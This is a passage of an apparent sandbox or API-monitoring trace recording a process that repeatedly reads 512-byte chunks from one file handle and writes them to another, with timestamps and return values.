ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.251] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.251] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.252] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.252] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.253] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.253] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.254] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.254] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.255] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.255] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.256] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.256] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.257] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.258] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.258] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.259] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.259] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.260] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.260] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.261] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.261] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.262] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.262] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.263] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.263] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.264] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.264] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.264] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.265] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.265] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.266] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.266] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.267] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.268] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.268] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.269] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.269] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.270] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.270] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.271] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.271] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.272] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.272] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.272] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.273] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.274] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.274] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.275] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.275] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.276] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.276] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.277] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.277] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.278] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.278] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.279] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.279] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.280] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.280] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.281] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.281] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.282] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.282] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.283] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.283] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.284] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.284] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.285] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.285] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.286] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.286] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.287] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.287] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.288] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.288] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.289] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.290] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.290] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.291] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.291] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.292] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.292] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.293] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.293] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.294] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.294] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.295] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.295] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.296] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.296] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.297] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.297] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.298] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.298] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.299] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.299] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.300] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.300] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.301] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.301] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, 